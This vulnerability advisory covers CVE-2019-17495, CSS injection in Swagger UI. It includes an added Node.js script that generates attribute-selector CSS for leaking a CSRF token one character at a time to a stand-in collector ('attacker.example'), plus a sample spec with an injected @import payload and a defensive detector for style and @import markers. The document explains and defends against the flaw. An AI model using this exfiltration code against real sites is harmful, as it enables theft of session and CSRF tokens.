Vulnerability Description
A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based exfiltration of input field values, such as a CSRF token. Swagger UI deliberately renders API definitions (JSON) fetched from remote servers, which is by design; what was not previously recognised is that a <style>@import directive placed inside that JSON (for example in a description field) is a working attack vector. Once attacker-controlled CSS is applied to the page, attribute selectors of the form input[name="csrf"][value^="a"] { background: url(https://attacker/a) } leak a field's value one character per matching rule, with no JavaScript execution required. A practitioner assessing exposure should note two preconditions: the target value must be present in the DOM as an attribute that CSS can match (such as value="..."), and the token-bearing form must be on a page to which the injected stylesheet applies.
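The following Node.js script is an added illustration, not code from the Swagger UI project or from the referenced advisory. It shows both halves of the pattern described above: the attribute-selector rule set an attacker-controlled stylesheet carries to leak a field value character by character, with a simulated browser standing in for the real one, and a pre-render check that walks an OpenAPI document and flags string fields carrying <style>, @import or url( so a proxy or spec validator can reject the document before a vulnerable Swagger UI renders it. The collector URL, the field name and the sample OpenAPI document are constructed for the example.

```javascript
// Added example (not Swagger UI project code): CSS attribute-selector exfiltration
// and a matching pre-render check, in plain Node.js with no dependencies.
// Collector URL, field name and sample spec are assumptions for illustration.

const ALPHABET = "0123456789abcdef"; // hex token alphabet assumed for the demo

// Attacker side: one rule per candidate next character. CSS attribute selectors
// compare the literal attribute, so the value must be reflected into value="...",
// as it is for a rendered CSRF token. Only the rule whose prefix matches fires.
function buildExfilCss(fieldName, knownPrefix, collector, alphabet = ALPHABET) {
  return [...alphabet]
    .map((ch) => {
      const guess = knownPrefix + ch;
      return `input[name="${fieldName}"][value^="${guess}"]{background:url(${collector}?v=${encodeURIComponent(guess)})}`;
    })
    .join("\n");
}

// Collector side: recover the leaked prefix from the request the browser made.
function prefixFromCallback(requestUrl) {
  return new URL(requestUrl).searchParams.get("v");
}

// Stand-in for the browser: the single rule whose prefix matches the field's
// actual value loads its background image; return the prefix that request leaks.
function simulateBrowser(css, actualValue) {
  const rule = /\[value\^="([^"]*)"\]\{background:url\(([^)]*)\)\}/g;
  let m;
  while ((m = rule.exec(css)) !== null) {
    if (actualValue.startsWith(m[1])) return prefixFromCallback(m[2]);
  }
  return null; // no rule matched: next character is outside the alphabet
}

// Drive the leak one character per round, the way chained @import stylesheets
// do against a live page. Stops early if a character is not in the alphabet.
function exfiltrate(fieldName, actualValue, collector) {
  let known = "";
  while (known.length < actualValue.length) {
    const leaked = simulateBrowser(buildExfilCss(fieldName, known, collector), actualValue);
    if (leaked === null) break;
    known = leaked;
  }
  return known;
}

// Defender side: markers that have no business in an API description.
const DANGEROUS = [/<style/i, /@import/i, /url\s*\(/i];

// Walk an OpenAPI document and return RFC 6901 pointers to every string field
// that carries a marker, e.g. "/info/description".
function findCssInjection(doc, path = "") {
  const hits = [];
  if (typeof doc === "string") {
    if (DANGEROUS.some((re) => re.test(doc))) hits.push(path || "/");
  } else if (Array.isArray(doc)) {
    doc.forEach((item, i) => hits.push(...findCssInjection(item, `${path}/${i}`)));
  } else if (doc && typeof doc === "object") {
    for (const [k, v] of Object.entries(doc)) {
      const key = k.replace(/~/g, "~0").replace(/\//g, "~1"); // pointer escaping
      hits.push(...findCssInjection(v, `${path}/${key}`));
    }
  }
  return hits;
}

// Constructed sample: a spec whose description carries an injected stylesheet.
const SAMPLE_SPEC = {
  openapi: "3.0.0",
  info: {
    title: "Pet store",
    description: "Pets API <style>@import url(/swagger-ui/index.html/x);</style>",
  },
  paths: {
    "/pets": { get: { summary: "List pets", responses: { 200: { description: "ok" } } } },
  },
};

console.log("flagged fields:", findCssInjection(SAMPLE_SPEC));
console.log("leaked token:", exfiltrate("csrf", "deadbeef", "https://attacker.example/leak"));
```

The detector is deliberately coarse: any of the three markers in a description, summary or other free-text field is enough to refuse the document, since a legitimate API definition has no need for stylesheets. The simulation leaks one character per round; a real attack chains @import stylesheets so each round's collector hit selects the next rule set, which is the part the RPO trick makes reachable from Swagger UI's rendered page.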
CVSS Score
9.8 (CRITICAL)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| SmartBear | Swagger UI | < 3.23.11 |
| Oracle | Banking APIs | >= 18.1, <= 18.3 |
| Oracle | Banking Digital Experience | >= 18.1, <= 18.3 |
| Oracle | Banking Platform | >= 2.4.0, <= 2.10.0 |
| Oracle | Primavera Gateway | >= 16.2.0, <= 16.2.11 |
| Oracle | Utilities Framework | 4.3.0.6.0 |
Related Weaknesses (CWE)
References
- https://github.com/swagger-api/swagger-ui/releases/tag/v3.23.11 (Release Notes)
- https://github.com/tarantula-team/CSS-injection-in-Swagger-UI (Exploit, Third Party Advisory)
- https://lists.apache.org/thread.html/r103579b01da2d0aa0f672b88f811224bbf8ef493aa
- https://lists.apache.org/thread.html/r3acb7e494cf1aab99b6784b7c5bbddfd0d4f8a484a
- https://lists.apache.org/thread.html/r84b327f7a8b6b28857b906c07a66dd98e1d341191f
- https://lists.apache.org/thread.html/r853ffeb915a400f899de78124d4e0d77a19379d2e1
- https://lists.apache.org/thread.html/ref70b940c4f69560d29d6ba792d6c82865e74de3dc
- https://www.oracle.com/security-alerts/cpuApr2021.html (Patch, Third Party Advisory)
- https://www.oracle.com/security-alerts/cpujan2022.html (Patch, Third Party Advisory)
- https://www.oracle.com/security-alerts/cpujul2022.html
- https://www.oracle.com/security-alerts/cpuoct2020.html (Patch, Third Party Advisory)
FAQ
What is CVE-2019-17495?
CVE-2019-17495 is a CSS injection vulnerability in Swagger UI before 3.23.11, rated 9.8 (CRITICAL). An attacker who can get Swagger UI to load a crafted JSON API definition uses the Relative Path Overwrite (RPO) technique, via a <style>@import directive in that JSON, to apply attacker-controlled CSS and exfiltrate input field values such as a CSRF token.
How severe is CVE-2019-17495?
CVE-2019-17495 has been rated CRITICAL with a CVSS base score of 9.8/10. This is considered a critical vulnerability requiring immediate attention.
Is there a patch for CVE-2019-17495?
Yes. Swagger UI 3.23.11 fixes the issue (see the release notes in the references above); Oracle shipped fixes for its affected products in the Critical Patch Updates listed there. Affected products include: SmartBear Swagger UI, Oracle Banking APIs, Oracle Banking Digital Experience, Oracle Banking Platform, Oracle Primavera Gateway and Oracle Utilities Framework. Deployments that embed an older Swagger UI build should also treat any ?url= or spec-URL parameter that lets users point the UI at an arbitrary remote definition as part of the attack surface until the upgrade is in place.